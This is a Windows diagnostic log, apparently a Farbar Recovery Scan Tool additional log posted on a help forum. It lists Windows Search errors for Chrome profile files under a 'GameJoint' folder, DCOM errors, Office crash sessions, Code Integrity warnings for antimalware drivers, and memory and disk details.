Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_2> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_1> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CURRENT SESSION> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS-JOURNAL> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA-JOURNAL> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.

 

Context:  Application, SystemIndex Catalog

 

 

Details:

A device attached to the system is not functioning.   (0x8007001f)

 

 

System errors:

=============

Error: (08/25/2014 01:43:07 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 01:36:58 PM) (Source: VDS Dynamic Provider) (EventID: 10) (User: )

Description: The provider failed while storing notifications from the driver. The Virtual Disk Service should be restarted. hr=80042505

 

Error: (08/25/2014 01:20:43 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 01:08:55 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:58:18 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:14:03 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 00:04:56 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:55:18 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:45:56 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

Error: (08/25/2014 11:26:20 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)

Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

 

 

Microsoft Office Sessions:

=========================

Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.

 

Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.

 

Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.

 

Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.

 

 

CodeIntegrity Errors:

===================================

  Date: 2014-08-25 13:41:40.016

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.905

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.794

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.682

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.419

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.308

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.196

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:39.070

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:27.280

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

 

  Date: 2014-08-25 13:41:27.171

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz

Percentage of memory in use: 49%

Total physical RAM: 3060.46 MB

Available physical RAM: 1540.3 MB

Total Pagefile: 6353.2 MB

Available Pagefile: 4717.66 MB

Total Virtual: 2047.88 MB

Available Virtual: 1907.04 MB

 

==================== Drives ================================

 

Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:222.38 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS

Drive f: (CC) (Removable) (Total:1.92 GB) (Free:1.88 GB) NTFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)

Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)

Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)

Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)

 

========================================================

Disk: 1 (Size: 1.9 GB) (Disk ID: E79A82AA)

Partition 1: (Active) - (Size=1.9 GB) - (Type=07 NTFS)

 

==================== End Of Log ============================


Link to post
Share on other sites